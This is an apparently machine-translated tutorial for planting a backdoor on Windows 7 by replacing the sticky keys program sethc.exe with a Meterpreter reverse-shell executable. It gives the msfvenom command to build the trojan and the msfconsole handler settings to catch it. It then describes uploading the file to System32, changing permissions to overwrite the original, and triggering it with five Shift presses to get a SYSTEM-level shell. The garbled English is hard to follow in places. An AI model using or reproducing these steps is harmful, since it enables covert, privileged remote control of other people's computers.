operating system : Windows 7 Flagship Edition

tool : kali Systematic msfconsole

5 second shift Principle of safeguarding rights

Windows In the system ,5 second shift Key can trigger sticky key , that is C:\Windows\System32\sethc.exe, We will cmd.exe Change to sethc.exe And replace the original sticky key , You can log in through the 5 second shift Key execution cmd, And yes system jurisdiction

in addition to , You can also use other tools to replace sethc.exe

First step , use kali of msfconsole Generate Trojan horse tool

1. open MSF
 2. Using development modules
use exploit/multi/handler
 3. Generate Trojan horse ,lhost Write your own ip,lport Write your own port , The function is to rebound shell To specify ip Port of
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f
exe -o sethc.exe
4. Because I open the terminal on the desktop , The generated Trojan file will be in the user's root directory , Open another terminal to view the file location


Step two , Listening port , Receive rebound shell

1. generate payload
set payload windows/meterpreter/reverse_tcp
2. Set bounce shell Location of ( own ip )
set lhost
3. Set port for bounce
set lport 4444
4. Turn on listening


Step 3 , replace sethc.exe

Upload the generated Trojan horse tool to the target host c:/windows/system32 Under the directory , And replace the original sethc.exe

source sethc.exe It cannot be modified or deleted directly , Need to modify permissions


Step 4 ,5 second shift trigger sethc.exe And rebound shell

1. Press on the target host 5 second shift trigger sethc.exe, No response , Because the program was replaced

2. see kali Listening status of , input shell You can enter the command line of the target host , And execute system commands